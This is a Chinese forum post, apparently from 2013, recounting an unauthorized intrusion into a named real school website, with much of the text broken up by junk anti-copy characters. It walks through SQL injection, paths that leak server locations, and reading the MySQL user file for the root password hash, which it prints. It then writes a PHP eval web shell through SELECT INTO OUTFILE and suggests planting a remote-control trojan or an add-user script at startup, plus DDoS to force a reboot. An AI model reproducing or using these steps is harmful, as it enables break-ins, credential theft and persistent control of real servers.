第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏8 }0 J' V# R0 j3 K+ h
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!$ R$ k' ?( e W7 c1 f7 ?
3 x" S( P: [% f/ I6 D( d- m9 y& _" b4 {7 R+ Z8 v _ d/ b
; o$ o; ^ J: h7 a5 ~- [; Z常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
2 x4 R! E( X3 g* s& L/ Y8 Y2 A/ |
那么想可以直接写入shell ,getshell有几个条件:3 {. X: g* l1 Q" g$ W4 v7 S, h
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
1 I$ h( G; q4 n, j7 P& n7 G2 u0 G1 [+ T# M' n
试着爆绝对路径:
$ h. K; u; i0 i) v0 A# {" w1./phpMyAdmin/index.php?lang[]=1
( u! y* D% W$ T9 y Q# P: c2./phpMyAdmin/phpinfo.php 8 x- `1 _2 ^0 \8 M
3./load_file() + H- B; _* p- H# y
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
% P3 F5 i- G& p; i5./phpmyadmin/libraries/select_lang.lib.php : {0 i' D5 c1 I; r% J" o( T& s
6./phpmyadmin/libraries/lect_lang.lib.php
+ _" a9 Y) x& ~- V7./phpmyadmin/libraries/mcrypt.lib.php / s9 e& N& [! u+ }8 i0 L
8./phpmyadmin/libraries/export/xls.php
4 B1 y4 I( z* h+ A4 ?$ T2 n" {. S! g& j/ P* U6 U$ U
均不行...........................
1 z( C( i1 p; L) P" z5 L, N% K1 U. `% B- L
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
4 j, ~, `+ u# g9 S5 u n
9 Q* B% J& w: Z权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
: {- E" s! Z2 m( k0 C2 b( e# E3 M
4 t9 y: u w) i0 M' ]) K默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 2 D7 V$ d* ~3 z7 ]" V' i% k
$ M, T- J8 u6 U7 {$ A$ S3 W- {' Q敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
2 _4 Y7 T0 r+ t# L6 u- j
$ E, E9 H: Q6 A) u a想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ! f1 B' I0 P3 A# o) A1 J+ C
3 @: m& K" U6 X3 Y9 `2 l) o4 T3 Dhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini & g7 ?4 k, M" |: s" Z5 W4 C* h1 N
" U: Y/ [$ f! {自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD , W* D0 x, E' U& d) n
: e3 \( g) s: R$ _7 p+ E- S3 f- k成功读到root密码: ( g2 K/ p, O4 D2 N
$ e3 E0 T% e0 d0 G- W) q4 N17---- r(0072) 2 [: P, a9 h" h% r9 e3 Z
18---- o(006f)
, S- {% x" i+ N2 _ M3 \4 [19---- o(006f) 3 c; t. \% V6 E. u" p7 p7 i
20---- t(0074)
+ J* F% Y% }2 y% M* X$ @/ j& g21---- *(002a) ' A% c( x: C5 O( p) j8 [
22---- 8(0038)
" ~% T/ e2 d6 n. N0 J4 I23---- 2(0032)
- t1 G" U, j, {% H6 b" C24---- E(0045)
' c! f, r: a: L2 k2 h1 W5 ~25---- 1(0031) + w7 v4 p( ^- @' S& J- U
26---- C(0043) ' X. l5 P6 M, ~: c2 V
27---- 5(0035)
' P x7 n1 r; O: }4 n28---- 8(0038) % |3 O/ v4 a3 _! J9 @" l! `
29---- 2(0032)
z$ {9 g& g/ H" T' I30---- 8(0038) " t* ~3 {% T8 L
31---- A(0041) ! H& P; ]( V2 Z+ v$ }" l" ]% u) d
32---- 9(0039) - ^4 I0 P% [5 F- E
33---- B(0042) 8 o2 ~8 Y4 Z2 R$ s f
34---- 5(0035) ; R. z9 ~3 b7 @1 S
35---- 4(0034) 7 i9 T4 L2 n* }0 }
36---- 8(0038)
6 X( t; z* R1 R7 v- Y+ L$ p% ]37---- 6(0036) " o, p N) `" j$ u
38---- 4(0034) ' T( i2 b @" z. |9 ?/ p% J
39---- 9(0039) * h: M# x8 ^6 j8 Z3 |) n
40---- 1(0031) 3 O) @' i5 w6 G8 X/ D
41---- 1(0031) , J; D( m# n+ A+ Y, i: Y
42---- 5(0035)
+ i0 f1 Q7 G. q% e: i4 m43---- 3(0033) 4 o& B- \# n# @: \0 b9 S
44---- 5(0035)
$ c# Z, U. @- ~7 Z45---- 9(0039)
: X* m! h, v% x M2 h2 M46---- 8(0038) - G7 {2 J5 [% X: I( O. i x
47---- F(0046)
; h( Y; O- q# n. Y- ^48---- F(0046)
, I9 _% x, |+ Q49---- 4(0034)
% Y; t& x6 x2 v50---- F(0046)
: c6 J/ A8 J/ n6 M/ x5 w8 k* n7 _51---- 0(0030) ; |4 e; Y& s. f( X! R
52---- 3(0033)
1 A5 g2 H, @4 i9 s53---- 2(0032) 7 n! d% K, E7 K8 z. @
54---- A(0041) 2 s' u2 i0 T9 D/ O9 _
55---- 4(0034) 2 U/ `2 C T' D7 J7 D9 M
56---- A(0041)
9 q7 G3 w# j" W9 C" k- g, j; L57---- B(0042)
& l4 I- A9 G! P( f58---- *(0044) + a: |% ?0 t" [. p
59---- *(0035) $ ]2 L Z3 o- I: v
60---- *(0041) . h5 ]. i7 U* V7 T! Q
61---- *0032) + {3 U' }; G' Q R' O
2 j6 b3 U3 ^$ r$ f, ^/ L解密后成功登陆phpmyamin
; q6 l6 \2 S; y. m' W H( u- G: Y " ]; V9 |% J1 d5 m6 ~' Z
) G5 m6 b5 w5 r4 P
& `# l) x B, S; C
8 W- [ f9 M& t' ?# F找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
/ z0 P; j0 k" j4 a! c
?/ [, E* S. M# g8 r5 a成功执行,拿下shell,菜刀连接:
+ z4 l0 \! @2 I( R5 K) `# J, w, s k3 F9 Z5 N/ i1 e. w
服务器不支持asp,aspx,php提权无果................... 2 B9 o% J) ~# d w# C
- I9 B- d$ J' [, C! M* i7 q8 L
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
* @2 K+ a. K3 I: d' ]- t3 a服务器上已经有个隐藏帐号了
( l5 p2 i g7 E别名 administrators
( p4 f2 u) Z5 z3 u/ r6 d注释 管理员对计算机/域有不受限制的完全访问权
! t! W+ N6 y; e& b# T0 u成员
3 }# p% i) z+ T1 E7 n-------------------------------------------------------------------------------' W; a; c5 f# ?8 g8 \! j k
admin
1 \) Y5 u/ _. y% y6 N7 rAdministrator
A9 ~" a0 ^9 O( B, L! Eslipper$
- _) ]8 R$ y/ wsqluser
! S2 H; B. u5 ^- k" O D% T命令成功完成。 8 M' C7 b5 \/ Y2 ~8 Z$ ]' y* w, E
" M8 O. [- e) T; J/ M& x1 m8 t
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
4 s/ v; t5 P- D# N( o+ m1 w% ~# @+ w* E) I
ddos服务器重启,不然就只能坐等服务器重启了...............................* n+ H' B3 K3 |; U2 d- M g
; D% k# y+ a1 _# z! c- b1 d/ F
5 R6 w1 I. u* w& z | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
